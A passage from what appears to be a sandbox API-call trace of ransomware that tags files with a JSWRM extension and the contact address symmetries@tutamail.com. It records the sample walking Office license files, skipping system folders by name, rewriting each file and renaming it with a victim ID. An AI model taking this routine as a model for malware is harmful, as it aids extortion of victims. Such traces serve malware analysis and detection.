lpFileSize=0x345ebf8*=24369) returned 1 [0105.657] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0105.657] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0105.660] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.660] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0105.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.660] CloseHandle (hObject=0x45c) returned 1 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0105.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0105.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.660] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0105.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.661] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6aa11e8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6aa11e8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6d2994f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", cAlternateFileName="O3899D~1.XRM")) returned 1 [0105.661] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.661] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.661] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.661] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.662] lstrcmpiW (lpString1="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0105.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.663] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0105.663] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.663] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.669] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.669] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.670] CloseHandle (hObject=0x45c) returned 1 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0105.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0105.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0105.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.670] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.671] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe70e34ec, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe70e34ec, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe71ee503, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2be3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="O3941E~1.XRM")) returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.671] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0105.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0105.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0105.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0105.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0105.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0105.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0105.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0105.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0105.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0105.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0105.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.672] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11235) returned 1 [0105.672] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2be0) returned 0x24c1d0 [0105.672] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2be0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2be0, lpOverlapped=0x0) returned 1 [0105.675] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.675] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2be0, lpOverlapped=0x0) returned 1 [0105.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.675] CloseHandle (hObject=0x45c) returned 1 [0105.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0105.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0105.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0105.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0105.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.676] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6a54cdd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6a54cdd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6d75e7c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d34, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="O365SM~1.XRM")) returned 1 [0105.676] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.677] lstrcmpiW (lpString1="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 47 [0105.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0105.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms", 